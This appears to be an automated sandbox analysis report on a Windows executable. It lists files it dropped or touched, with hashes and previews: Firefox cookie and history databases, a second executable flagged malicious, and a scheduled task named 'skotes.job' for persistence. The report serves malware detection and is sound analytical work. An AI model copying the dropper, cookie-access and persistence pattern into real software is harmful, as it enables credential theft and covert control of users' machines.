SHA-256:	2A4D526B9D1C8665427FB9E0DA58D16FDDE382DD74C1258941B18701EF7880C3
SHA-512:	B76AF22153F79BCA2429A23746A62A430A521E952E7F94936648ECFD25AFDD9801ACBF6FD16941918A4FEDE39DE747AB6C6336BC86CA74384920AF7E815DB855
Malicious:	false
Preview:	{.. "author": {.. "email": "docs-hosted-app-own@google.com".. },.. "background": {.. "service_worker": "service_worker_bin_prod.js".. },.. "content_capabilities": {.. "matches": [ "https://docs.google.com/", "https://drive.google.com/", "https://drive-autopush.corp.google.com/", "https://drive-daily-0.corp.google.com/", "https://drive-daily-1.corp.google.com/", "https://drive-daily-2.corp.google.com/", "https://drive-daily-3.corp.google.com/", "https://drive-daily-4.corp.google.com/", "https://drive-daily-5.corp.google.com/", "https://drive-daily-6.corp.google.com/", "https://drive-preprod.corp.google.com/", "https://drive-staging.corp.google.com/" ],.. "permissions": [ "clipboardRead", "clipboardWrite", "unlimitedStorage" ].. },.. "content_security_policy": {.. "extension_pages": "script-src 'self'; object-src 'self'".. },.. "default_locale": "en_US",.. "description": "__MSG_extDesc__",.. "externally_connectable": {.. "ma

C:\Users\user\AppData\Local\Temp\scoped_dir8156_1747464646\CRX_INSTALL\offscreendocument.html

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	HTML document, ASCII text
Category:	dropped
Size (bytes):	97
Entropy (8bit):	4.862433271815736
Encrypted:	false
SSDEEP:	3:PouV7uJL5XL/oGLvLAAJR90bZNGXIL0Hac4NGb:hxuJL5XsOv0EmNV4HX4Qb
MD5:	B747B5922A0BC74BBF0A9BC59DF7685F
SHA1:	7BF124B0BE8EE2CFCD2506C1C6FFC74D1650108C
SHA-256:	B9FA2D52A4FFABB438B56184131B893B04655B01F336066415D4FE839EFE64E7
SHA-512:	7567761BE4054FCB31885E16D119CD4E419A423FFB83C3B3ED80BFBF64E78A73C2E97AAE4E24AB25486CD1E43877842DB0836DB58FBFBCEF495BC53F9B2A20EC
Malicious:	false
Preview:	<!DOCTYPE html>.<html>.<body>. <script src="offscreendocument_main.js"></script>.</body>.</html>

C:\Users\user\AppData\Local\Temp\scoped_dir8156_1747464646\CRX_INSTALL\offscreendocument_main.js

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	ASCII text, with very long lines (3777)
Category:	dropped
Size (bytes):	98880
Entropy (8bit):	5.414989230634404
Encrypted:	false
SSDEEP:	1536:M+TW9bPq1M3ZOC0pJ/BjXf3Zk/7hry6fq66V3gr9KUw5SXfPxhZhGurH6c/V:WPLZwJJXf3ZvRV3gJKU/fP+urHRV
MD5:	DC93A1045D1AD8D7ADD06B93B2FE79E2
SHA1:	CAFCC8DB7F8E3FD2F8C1EFAC7B385D7616F55EA3
SHA-256:	D5CEB4449384CD2D7898C052B7B99417961880945FC4EAE80EBBAF8E24CC0A3E
SHA-512:	025F7103D1F7D607825BE916D0131C1E04B295EB562974A77F5A16E7BF40250B5608071779B420E4738F86F09A6F7C889469FA898268894FFFEEB7465C589E81
Malicious:	false
Preview:	'use strict';function aa(){return function(a){return a}}function ba(){return function(){}}function l(a){return function(){return this[a]}}function ca(a){return function(){return a}}var n;function da(a){var b=0;return function(){return b<a.length?{done:!1,value:a[b++]}:{done:!0}}}var ea=typeof Object.defineProperties=="function"?Object.defineProperty:function(a,b,c){if(a==Array.prototype\|\|a==Object.prototype)return a;a[b]=c.value;return a};.function fa(a){a=["object"==typeof globalThis&&globalThis,a,"object"==typeof window&&window,"object"==typeof self&&self,"object"==typeof global&&global];for(var b=0;b<a.length;++b){var c=a[b];if(c&&c.Math==Math)return c}throw Error("Cannot find global object");}var q=fa(this);function r(a,b){if(b)a:{var c=q;a=a.split(".");for(var d=0;d<a.length-1;d++){var e=a[d];if(!(e in c))break a;c=c[e]}a=a[a.length-1];d=c[a];b=b(d);b!=d&&b!=null&&ea(c,a,{configurable:!0,writable:!0,value:b})}}.r("Symbol",function(a){function b(f){if(this instanceof b)throw new Ty

C:\Users\user\AppData\Local\Temp\scoped_dir8156_1747464646\CRX_INSTALL\page_embed_script.js

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	ASCII text
Category:	dropped
Size (bytes):	291
Entropy (8bit):	4.65176400421739
Encrypted:	false
SSDEEP:	6:2LGX86tj66rU8j6D3bWq2un/XBtzHrH9Mnj63LK603:2Q8KVqb2u/Rt3Onj1
MD5:	3AB0CD0F493B1B185B42AD38AE2DD572
SHA1:	079B79C2ED6F67B5A5BD9BC8C85801F96B1B0F4B
SHA-256:	73E3888CCBC8E0425C3D2F8D1E6A7211F7910800EEDE7B1E23AD43D3B21173F7
SHA-512:	32F9DB54654F29F39D49F7A24A1FC800DBC0D4A8A1BAB2369C6F9799BC6ADE54962EFF6010EF6D6419AE51D5B53EC4B26B6E2CDD98DEF7CC0D2ADC3A865F37D3
Malicious:	false
Preview:	(function(){window._docs_chrome_extension_exists=!0;window._docs_chrome_extension_features_version=2;window._docs_chrome_extension_permissions="alarms clipboardRead clipboardWrite storage unlimitedStorage offscreen".split(" ");window._docs_chrome_extension_manifest_version=3;}).call(this);.

C:\Users\user\AppData\Local\Temp\scoped_dir8156_1747464646\CRX_INSTALL\service_worker_bin_prod.js

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	ASCII text, with very long lines (3782)
Category:	dropped
Size (bytes):	107677
Entropy (8bit):	5.396220758526552
Encrypted:	false
SSDEEP:	1536:7nwyvB1qCo7mWUgsUopF5Xy4FlAwxdhvHcrdncqAKxwjBnKwIDQgrOChkPIgmrCp:wh6gstXy4FM5ncJKxCnKWgrd0v
MD5:	E8015AC436B33034EDF7DA060E853A04
SHA1:	62D0F6EB0E441158A1F56F6E0C70D3D229B57886
SHA-256:	23C953E989FF4AF6126D4A3B2AD21B33A82512FC8768045C00F05940DE2C9978
SHA-512:	C35AC8692FC22B78365CA202E173A90AE4B5DBA338B7FC9EEB17EDDF5868B52CF1D13DC0EDAF36BE1CC0E0152F41AC4027C51D7ECA27778B483E3FC83F11EA82
Malicious:	false
Preview:	'use strict';function aa(){return function(a){return a}}function ba(){return function(){}}function k(a){return function(){return this[a]}}function ca(a){return function(){return a}}var n;function da(a){var b=0;return function(){return b<a.length?{done:!1,value:a[b++]}:{done:!0}}}var ea=typeof Object.defineProperties=="function"?Object.defineProperty:function(a,b,c){if(a==Array.prototype\|\|a==Object.prototype)return a;a[b]=c.value;return a};.function fa(a){a=["object"==typeof globalThis&&globalThis,a,"object"==typeof window&&window,"object"==typeof self&&self,"object"==typeof global&&global];for(var b=0;b<a.length;++b){var c=a[b];if(c&&c.Math==Math)return c}throw Error("Cannot find global object");}var q=fa(this);function r(a,b){if(b)a:{var c=q;a=a.split(".");for(var d=0;d<a.length-1;d++){var e=a[d];if(!(e in c))break a;c=c[e]}a=a[a.length-1];d=c[a];b=b(d);b!=d&&b!=null&&ea(c,a,{configurable:!0,writable:!0,value:b})}}.r("Symbol",function(a){function b(f){if(this instanceof b)throw new Ty

C:\Users\user\AppData\Local\Temp\scoped_dir8156_1747464646\d13cacc1-76e9-4061-9947-070987742f36.tmp

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	Google Chrome extension, version 3
Category:	dropped
Size (bytes):	138356
Entropy (8bit):	7.809609231921042
Encrypted:	false
SSDEEP:	3072:AQ++ZdS5+fnwcxO+XwquyeNnmraugZ/1DOoncWD/5q:AQ++/PZmlyeNnh/1SmRq
MD5:	3F6F93C3DCCD4A91C4EB25C7F6FEB1C1
SHA1:	9B73F46ADFA1F4464929B408407E73D4535C6827
SHA-256:	19F05352CB4C6E231C1C000B6C8B7E9EDCC1E8082CAF46FFF16B239D32AA7C9E
SHA-512:	D488FA67E3A29D0147E9EAF2EABC74D9A255F8470CF79A4AEA60E3B3B5E48A3FCBC4FC3E9CE58DFF8D7D0CAA8AE749295F221E1FE1BA5D20DEB2D97544A12BA4
Malicious:	false
Preview:	Cr24..............0.."0....H.............0.........^...1"...w.g..t..2J.G1.)X4..=&.?[j,Lz..j.u.e[I.qBa/X...P.h..L.....2%3_o.......H.)'.=.e...?.......j..3UH.\|.X.M..u..s[...?$....F%....I....)..,-./.e5).f..O.q.^........9..(.._.ph2..^.YBPXf_8....h[.v...S.1`.#..5.SF.:f-.#.65.i..b.]9...y2.'....k[........q.a.....E..i.t,..7C..7!...`l.-.......T.vH...~.....'..aH..C.oJOE..d..2..$J......I..;.(9l.(..+.N.6.@...].a.n.S.6..=.b.W.\....o...#.~J.W.1..E...2H....S.g0....../.H...y.O8...kE.,..m!..F.D.p......H..s.W ...#.L........Ij.........-..n..\..vD.d.V.....!......[0Y0....H.=.....H.=....B..............r...2..+Y.I...k..bR.j5Sl..8.......H"i.-l..`.Q.{...F0D. ?Eq.M...[6^...+.].G..Y]...7..o.. U...v....P.J...@.E!...B.d..p..i".%............oo.<....~=..!t.+...`....h..LK....0....h...,.R%.....u...._..V_.q:_._..5}.uS\.....x?...~]..C-....S=L...._c.P.B....-M...62.i*.Q.....9.....+S=...../6:...W..ql/g..&j.y..{.."....\|..F....\|....V....w.%t.y..?..&..a..<.n....S+\|..=.ra.....

C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\cookies.sqlite-shm

Download File

Process:	C:\Users\user\Desktop\file.exe
File Type:	data
Category:	dropped
Size (bytes):	32768
Entropy (8bit):	0.017262956703125623
Encrypted:	false
SSDEEP:	3:G8lQs2TSlElQs2TtPRp//:G0QjSaQjrpX
MD5:	B7C14EC6110FA820CA6B65F5AEC85911
SHA1:	608EEB7488042453C9CA40F7E1398FC1A270F3F4
SHA-256:	FD4C9FDA9CD3F9AE7C962B0DDF37232294D55580E1AA165AA06129B8549389EB
SHA-512:	D8D75760F29B1E27AC9430BC4F4FFCEC39F1590BE5AEF2BFB5A535850302E067C288EF59CF3B2C5751009A22A6957733F9F80FA18F2B0D33D90C068A3F08F3B0
Malicious:	false
Preview:	..-.....................................8...5.....-.....................................8...5...........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\places.sqlite-shm

Download File

Process:	C:\Users\user\Desktop\file.exe
File Type:	data
Category:	dropped
Size (bytes):	32768
Entropy (8bit):	0.017262956703125623
Encrypted:	false
SSDEEP:	3:G8lQs2TSlElQs2TtPRp//:G0QjSaQjrpX
MD5:	B7C14EC6110FA820CA6B65F5AEC85911
SHA1:	608EEB7488042453C9CA40F7E1398FC1A270F3F4
SHA-256:	FD4C9FDA9CD3F9AE7C962B0DDF37232294D55580E1AA165AA06129B8549389EB
SHA-512:	D8D75760F29B1E27AC9430BC4F4FFCEC39F1590BE5AEF2BFB5A535850302E067C288EF59CF3B2C5751009A22A6957733F9F80FA18F2B0D33D90C068A3F08F3B0
Malicious:	false
Preview:	..-.....................................8...5.....-.....................................8...5...........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\DocumentsJDAFHCGIJE.exe

Download File

Process:	C:\Users\user\Desktop\file.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	1931776
Entropy (8bit):	7.951371138114382
Encrypted:	false
SSDEEP:	49152:3vkiCocWLaGUvpxuMjv1jVep2uqJAQNgLPRBfxBp8:3MiFGpjjv1xPzyRY
MD5:	7E87644426BB54D86265DD3C83727973
SHA1:	5D7148BDFA59CDC79275E087AA0FC6A7659C2029
SHA-256:	BBA49D9C5A233F7916671750711049BE4108A7FFAE09E955BC9E90C03D2C4AB1
SHA-512:	1E29CACA935AF25E29C9C5F5E927F97E1BE70792300F2D5A8720E29E8DE1647EE24BA4462AE13FD186D064FEB83A64380A96ED202363A545C89A13DAB9A08A9B
Malicious:	true
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........-I..C...C...C...@...C...F.B.C.6.G...C.6.@...C.6.F...C...G...C...B...C...B.5.C.x.J...C.x.....C.x.A...C.Rich..C.........................PE..L....V.f..............................L...........@...........................L.....Z.....@.................................W...k.......H....................kL..............................kL..................................................... . ............................@....rsrc...H...........................@....idata ............................@... .`+.........................@...sxkyywio.`....2..\..................@...kanpqnsy.....pL......T..............@....taggant.0....L.."...X..............@...................................................................................................................................................................................................................

C:\Windows\Tasks\skotes.job

Download File

Process:	C:\Users\user\DocumentsJDAFHCGIJE.exe
File Type:	data
Category:	dropped
Size (bytes):	302
Entropy (8bit):	3.4301130625721394
Encrypted:	false
SSDEEP:	6:g+rXUhXUEZ+lX1CGdKUe6tE9+AQy0lBgt0:g+74Q1CGAFD9+nVBgt0
MD5:	1BFF62B22CA1B2680181BA917227CD6D
SHA1:	7800F927B14785FD5CB8EA2EE099C3FA1B3764B7
SHA-256:	8E7DA8D5B1CB9DB7E192E7FBA5C65D339D69DAE44449B6A6C321E9A5DFF979A5
SHA-512:	BAA2DAF13EBFF2A098B70ABBF4814CD417576CFCF1BD23756F9F9480BA411C2B30201C454779DB73EC5BE3CA492C7DD4BF646DC563E2683CAD884B6021F490F5
Malicious:	false
Preview:	......M..".@..e(>..PF.......<... .....s.......... ....................;.C.:.\.U.s.e.r.s.\.e.n.g.i.n.e.e.r.\.A.p.p.D.a.t.a.\.L.o.c.a.l.\.T.e.m.p.\.a.b.c.3.b.c.1.9.8.5.\.s.k.o.t.e.s...e.x.e.........E.N.G.I.N.E.E.R.-.P.C.\.e.n.g.i.n.e.e.r...................0...................@3P.........................

Chrome Cache Entry: 568

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	ASCII text, with very long lines (5404)
Category:	downloaded
Size (bytes):	5409
Entropy (8bit):	5.811981998439679
Encrypted:	false
SSDEEP:	96:DbgliIJIN66662+rlBgvcbZpDDJrIT/OXOM9TFQQffffo:WMN66663lSvyDRILe59xC
MD5:	032DE353A702A9E0359424497C8D9516
SHA1:	F41B3E855D84A0EDB52C704A27CCD3A0E38693A3
SHA-256:	174599E15DB1C0423F243C80D2C8F8E5FF1AC443146BC6181A23A59AE2E159A9
SHA-512:	3457C5D84633D091EC8551AF4514B27BEECF7CBD7DA4874C1B10D0A6D83215BE15F160B679B314C5FFCD33799A6A4665DC248C39F957173645A174E6FE0DD595
Malicious:	false
URL:	https://www.google.com/complete/search?client=chrome-omni&gs_ri=chrome-ext-ansg&xssi=t&q=&oit=0&oft=1&pgcl=20&gs_rn=42&sugkey=AIzaSyBOti4mM-6x9WDnZIjIeyEU21OpBXqWBgw
Preview:	)]}'.["",["2025 nfl mock drafts","drinking water chemical","college girls season 3","overwatch hero hazard","social security payments","bomb cyclone storm california","november 22 wordle answer","monopoly go space sprouts rewards"],["","","","","","","",""],[],{"google:clientdata":{"bpc":false,"tlw":false},"google:groupsinfo":"ChgIkk4SEwoRVHJlbmRpbmcgc2VhcmNoZXM\u003d","google:suggestdetail":[{"zl":10002},{"google:entityinfo":"CggvbS8wODM4ZhITV2F0ZXIg4oCUIENvbXBvdW5kczLrGWRhdGE6aW1hZ2UvanBlZztiYXNlNjQsLzlqLzRBQVFTa1pKUmdBQkFRQUFBUUFCQUFELzJ3Q0VBQWtHQndnSEJna0lCd2dLQ2drTERSWVBEUXdNRFJzVUZSQVdJQjBpSWlBZEh4OGtLRFFzSkNZeEp4OGZMVDB0TVRVM09qbzZJeXMvUkQ4NFF6UTVPamNCQ2dvS0RRd05HZzhQR2pjbEh5VTNOemMzTnpjM056YzNOemMzTnpjM056YzNOemMzTnpjM056YzNOemMzTnpjM056YzNOemMzTnpjM056YzNOemMzTi8vQUFCRUlBRUFBUUFNQkVRQUNFUUVERVFIL3hBQWJBQUFDQWdNQkFBQUFBQUFBQUFBQUFBQUVCUUlEQVFZSEFQL0VBRFVRQUFJQkFnVUNCQU1HQmdNQUFBQUFBQUVDQXdRUkFBVVNJVEVUUVFZaVVXRVVNb0VqY1pHeHdkRlNjb0toOFBFVkpVTC94QUFhQVFBREFRRUJBUUFBQUFBQUFBQUFBQ

Chrome Cache Entry: 569

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	ASCII text, with very long lines (2586)
Category:	downloaded
Size (bytes):	175021
Entropy (8bit):	5.5519862292821776
Encrypted:	false
SSDEEP:	3072:kEBR0Kx4gWiUIzT2Zu2AuhZNsWGUHUylZBTftnn2N2DIWHUm1CBT46mG3bXnejYR:kKR0oWiUIzy42AuXNsWGUHLlZBTftn2b
MD5:	6ECBEC06F6245882E6D9659E66022263
SHA1:	F86FC301A3851511557DF798AD2BAD2AA4659946
SHA-256:	F7885470D82B8357E5AD03205AC0885DD9FD6F965E550D746627E5E35D4CF66B
SHA-512:	F2EDD978C9DC289B82DC0956503659B92C3B621DD1001DB2C5C34ACA01FFCDE7F84A6B24ED0B30A1EA6B15D937B6DD93FAE1DB97DCE26E9F9FCE1A3F5C43A8DD
Malicious:	false
URL:	"https://www.gstatic.com/og/_/js/k=og.qtm.en_US._3uvDuX1Bhg.2019.O/rt=j/m=q_dnp,qmd,qcwid,qapid,qald,qads,q_dg/exm=qaaw,qabr,qadd,qaid,qalo,qebr,qein,qhaw,qhawgm3,qhba,qhbr,qhbrgm3,qhch,qhchgm3,qhga,qhid,qhidgm3,qhin,qhlo,qhlogm3,qhmn,qhpc,qhsf,qhsfgm3,qhtt/d=1/ed=1/rs=AA2YrTus2ZfPv70D5bJuGT4XDgi-VtNqjg"
Preview:	this.gbar_=this.gbar_\|\|{};(function(_){var window=this;.try{._.Yi=function(a){if(4&a)return 4096&a?4096:8192&a?8192:0};_.Zi=class extends _.Q{constructor(){super()}};.}catch(e){_._DumpException(e)}.try{.var $i,aj,ej,hj,gj,cj,fj;$i=function(a){try{return a.toString().indexOf("[native code]")!==-1?a:null}catch(b){return null}};aj=function(){_.Na()};ej=function(a,b){(_.bj\|\|(_.bj=new cj)).set(a,b);(_.dj\|\|(_.dj=new cj)).set(b,a)};hj=function(a){if(fj===void 0){const b=new gj([],{});fj=Array.prototype.concat.call([],b).length===1}fj&&typeof Symbol==="function"&&Symbol.isConcatSpreadable&&(a[Symbol.isConcatSpreadable]=!0)};_.ij=function(a,b,c){a=_.tb(a,b,c);return Array.isArray(a)?a:_.Fc};._.jj=function(a,b){a=(2&b?a\|2:a&-3)\|32;return a&=-2049};_.kj=function(a,b){a===0&&(a=_.jj(a,b));return a\|1};_.lj=function(a){return!!(2&a)&&!!(4&a)\|\|!!(2048&a)};_.mj=function(a,b,c){32&b&&c\|\|(a&=-33);return a};._.pj=function(a,b,c,d,e,f,g){a=a.ha;var h=!!(2&b);e=h?1:e;f=!!f;g&&(g=!h);h=_.ij(a,b,d);var k=h[_

Chrome Cache Entry: 570

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	ASCII text
Category:	downloaded
Size (bytes):	29
Entropy (8bit):	3.9353986674667634
Encrypted:	false
SSDEEP:	3:VQAOx/1n:VQAOd1n
MD5:	6FED308183D5DFC421602548615204AF
SHA1:	0A3F484AAA41A60970BA92A9AC13523A1D79B4D5
SHA-256:	4B8288C468BCFFF9B23B2A5FF38B58087CD8A6263315899DD3E249A3F7D4AB2D
SHA-512:	A2F7627379F24FEC8DC2C472A9200F6736147172D36A77D71C7C1916C0F8BDD843E36E70D43B5DC5FAABAE8FDD01DD088D389D8AE56ED1F591101F09135D02F5
Malicious:	false
URL:	https://www.google.com/async/newtab_promos
Preview:	)]}'.{"update":{"promos":{}}}

Chrome Cache Entry: 571

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	ASCII text, with very long lines (65531)
Category:	downloaded
Size (bytes):	132965
Entropy (8bit):	5.435261092453303
Encrypted:	false
SSDEEP:	3072:fQkXyPqO7UX1Hme9kZbs4Voc5BSnXqwQ2i6o:f7yWFHrp4Voc5BSnawQ8o
MD5:	9635E9A2DD005F2CE42A373DEF9427F7
SHA1:	04852371566E0D03B83C4EBA645B1E7493E34824
SHA-256:	520287088BF01CDAA40298F7C1EC80B0351B48E65DC4DF2E587457F4E6B7B514
SHA-512:	A37C0A0BAD266671BE3C3CEEAD636F092D01E430E90297F0C57C01FB780B1A93B581A52286EC6D11E46B788ED6DF02250895B850375E312469B8C3A31C25D397
Malicious:	false
URL:	https://www.google.com/async/newtab_ogb?hl=en-US&async=fixed:0
Preview:	)]}'.{"update":{"language_code":"en-US","ogb":{"html":{"private_do_not_access_or_else_safe_html_wrapped_value":"\u003cheader class\u003d\"gb_Ea gb_2d gb_Qe gb_qd\" id\u003d\"gb\" role\u003d\"banner\" style\u003d\"background-color:transparent\"\u003e\u003cdiv class\u003d\"gb_Pd\"\u003e\u003c\/div\u003e\u003cdiv class\u003d\"gb_kd gb_od gb_Fd gb_ld\"\u003e\u003cdiv class\u003d\"gb_wd gb_rd\"\u003e\u003cdiv class\u003d\"gb_Jc gb_Q\" aria-expanded\u003d\"false\" aria-label\u003d\"Main menu\" role\u003d\"button\" tabindex\u003d\"0\"\u003e\u003csvg focusable\u003d\"false\" viewbox\u003d\"0 0 24 24\"\u003e\u003cpath d\u003d\"M3 18h18v-2H3v2zm0-5h18v-2H3v2zm0-7v2h18V6H3z\"\u003e\u003c\/path\u003e\u003c\/svg\u003e\u003c\/div\u003e\u003cdiv class\u003d\"gb_Jc gb_Mc gb_Q\" aria-label\u003d\"Go back\" title\u003d\"Go back\" role\u003d\"button\" tabindex\u003d\"0\"\u003e\u003csvg focusable\u003d\"false\" viewbox\u003d\"0 0 24 24\"\u003e\u003cpath d\u003d\"M20 11H7.83l5.59-5.59L12 4l-8 8 8 8 1.41-1.

Chrome Cache Entry: 572

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	ASCII text, with very long lines (5162), with no line terminators
Category:	downloaded
Size (bytes):	5162
Entropy (8bit):	5.3503139230837595
Encrypted:	false
SSDEEP:	96:lXTMb1db1hNY/cobkcsidqg3gcIOnAg8IF8uM8DvY:lXT0TGKiqggdaAg8IF8uM8DA
MD5:	7977D5A9F0D7D67DE08DECF635B4B519
SHA1:	4A66E5FC1143241897F407CEB5C08C36767726C1
SHA-256:	FE8B69B644EDDE569DD7D7BC194434C57BCDF60280078E9F96EEAA5489C01F9D
SHA-512:	8547AE6ACA1A9D74A70BF27E048AD4B26B2DC74525F8B70D631DA3940232227B596D56AB9807E2DCE96B0F5984E7993F480A35449F66EEFCF791A7428C5D0567
Malicious:	false
URL:	"https://www.gstatic.com/og/_/ss/k=og.qtm.zyyRgCCaN80.L.W.O/m=qmd,qcwid/excm=qaaw,qabr,qadd,qaid,qalo,qebr,qein,qhaw,qhawgm3,qhba,qhbr,qhbrgm3,qhch,qhchgm3,qhga,qhid,qhidgm3,qhin,qhlo,qhlogm3,qhmn,qhpc,qhsf,qhsfgm3,qhtt/d=1/ed=1/ct=zgms/rs=AA2YrTs4SLbgh5FvGZPW_Ny7TyTdXfy6xA"
Preview:	.gb_P{-webkit-border-radius:50%;border-radius:50%;bottom:2px;height:18px;position:absolute;right:0;width:18px}.gb_Ja{-webkit-border-radius:50%;border-radius:50%;-webkit-box-shadow:0px 1px 2px 0px rgba(60,64,67,.30),0px 1px 3px 1px rgba(60,64,67,.15);box-shadow:0px 1px 2px 0px rgba(60,64,67,.30),0px 1px 3px 1px rgba(60,64,67,.15);margin:2px}.gb_Ka{fill:#f9ab00}.gb_F .gb_Ka{fill:#fdd663}.gb_La>.gb_Ka{fill:#d93025}.gb_F .gb_La>.gb_Ka{fill:#f28b82}.gb_La>.gb_Ma{fill:white}.gb_Ma,.gb_F .gb_La>.gb_Ma{fill:#202124}.gb_Na{-webkit-clip-path:path("M16 0C24.8366 0 32 7.16344 32 16C32 16.4964 31.9774 16.9875 31.9332 17.4723C30.5166 16.5411 28.8215 16 27 16C22.0294 16 18 20.0294 18 25C18 27.4671 18.9927 29.7024 20.6004 31.3282C19.1443 31.7653 17.5996 32 16 32C7.16344 32 0 24.8366 0 16C0 7.16344 7.16344 0 16 0Z");clip-path:path("M16 0C24.8366 0 32 7.16344 32 16C32 16.4964 31.9774 16.9875 31.9332 17.4723C30.5166 16.5411 28.8215 16 27 16C22.0294 16 18 20.0294 18 25C18 27.4671 18.9927 29.7024 20.6004 3

Chrome Cache Entry: 573

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	SVG Scalable Vector Graphics image
Category:	downloaded
Size (bytes):	1660
Entropy (8bit):	4.301517070642596
Encrypted:	false
SSDEEP:	48:A/S9VU5IDhYYmMqPLmumtrYW2DyZ/jTq9J:A2VUSDhYYmM5trYFw/jmD
MD5:	554640F465EB3ED903B543DAE0A1BCAC
SHA1:	E0E6E2C8939008217EB76A3B3282CA75F3DC401A
SHA-256:	99BF4AA403643A6D41C028E5DB29C79C17CBC815B3E10CD5C6B8F90567A03E52
SHA-512:	462198E2B69F72F1DC9743D0EA5EED7974A035F24600AA1C2DE0211D978FF0795370560CBF274CCC82C8AC97DC3706C753168D4B90B0B81AE84CC922C055CFF0
Malicious:	false
URL:	https://www.gstatic.com/images/branding/googlelogo/svg/googlelogo_clr_74x24px.svg
Preview:	<svg xmlns="http://www.w3.org/2000/svg" width="74" height="24" viewBox="0 0 74 24"><path fill="#4285F4" d="M9.24 8.19v2.46h5.88c-.18 1.38-.64 2.39-1.34 3.1-.86.86-2.2 1.8-4.54 1.8-3.62 0-6.45-2.92-6.45-6.54s2.83-6.54 6.45-6.54c1.95 0 3.38.77 4.43 1.76L15.4 2.5C13.94 1.08 11.98 0 9.24 0 4.28 0 .11 4.04.11 9s4.17 9 9.13 9c2.68 0 4.7-.88 6.28-2.52 1.62-1.62 2.13-3.91 2.13-5.75 0-.57-.04-1.1-.13-1.54H9.24z"/><path fill="#EA4335" d="M25 6.19c-3.21 0-5.83 2.44-5.83 5.81 0 3.34 2.62 5.81 5.83 5.81s5.83-2.46 5.83-5.81c0-3.37-2.62-5.81-5.83-5.81zm0 9.33c-1.76 0-3.28-1.45-3.28-3.52 0-2.09 1.52-3.52 3.28-3.52s3.28 1.43 3.28 3.52c0 2.07-1.52 3.52-3.28 3.52z"/><path fill="#4285F4" d="M53.58 7.49h-.09c-.57-.68-1.67-1.3-3.06-1.3C47.53 6.19 45 8.72 45 12c0 3.26 2.53 5.81 5.43 5.81 1.39 0 2.49-.62 3.06-1.32h.09v.81c0 2.22-1.19 3.41-3.1 3.41-1.56 0-2.53-1.12-2.93-2.07l-2.22.92c.64 1.54 2.33 3.43 5.15 3.43 2.99 0 5.52-1.76 5.52-6.05V6.49h-2.42v1zm-2.93 8.03c-1.76 0-3.1-1.5-3.1-3.52 0-2.05 1.34-3.52 3.1-3

Static File Info

General

File type:	PE32 executable (GUI) Intel 80386, for MS Windows
Entropy (8bit):	7.943161682445389
TrID:	Win32 Executable (generic) a (10002005/4) 99.96% Generic Win/DOS Executable (2004/3) 0.02% DOS Executable Generic (2002/1) 0.02% Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
File name:	file.exe
File size:	1'832'960 bytes
MD5:	9f1e2f4308ddb08ce70a669d67a97763
SHA1:	fa3222ecc5bc0e59f5bcd16562bdc0cb9be9f1ee
SHA256:	f4a38bfe6d64ae092c608adf24f3b294710aacc510f628c4e19e1a1800fb42b8
SHA512:	d788a4497a4273f379ec2ca975941289eece214b391576133e86ba517224081a82004df6fdab139e674575e32c459c880f433970a7714b7a5e936741e9217c0c
SSDEEP:	24576:ItKn/l1KCGkWy8u4Xju2cyzw3ldmguquIYJScPLK/VoF1mVLd7q:IOtR9qX9zwSqMPjYZ
TLSH:	E7853323F9120C2ED50F49328B769B5ABA3D8539768A02D2EC8084FD66F1B15F48FD75
File Content Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........8...k...k...k..'k...k...k...k..&k...k...k...k...k...k...j...k...k...k..#k...k...k...kRich...k........................PE..L..

File Icon


Icon Hash:	00928e8e8686b000

Static PE Info

General

Entrypoint:	0xaa4000
Entrypoint Section:	.taggant
Digitally signed:	false
Imagebase:	0x400000
Subsystem:	windows gui
Image File Characteristics:	EXECUTABLE_IMAGE, 32BIT_MACHINE
DLL Characteristics:	DYNAMIC_BASE, TERMINAL_SERVER_AWARE
Time Stamp:	0x672FC34F [Sat Nov 9 20:17:19 2024 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	5
OS Version Minor:	1
File Version Major:	5
File Version Minor:	1
Subsystem Version Major:	5
Subsystem Version Minor:	1
Import Hash:	2eabe9054cad5152567f0699947a2c5b

Entrypoint Preview

Instruction
jmp 00007F400CFF1A7Ah

Rich Headers

Programming Language:

[C++] VS2010 build 30319
[ASM] VS2010 build 30319
[ C ] VS2010 build 30319
[ C ] VS2008 SP1 build 30729
[IMP] VS2008 SP1 build 30729
[LNK] VS2010 build 30319

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0x24b04d	0x61	.idata
IMAGE_DIRECTORY_ENTRY_RESOURCE	0x24a000	0x2b0	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC	0x24b1f8	0x8	.idata
IMAGE_DIRECTORY_ENTRY_DEBUG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
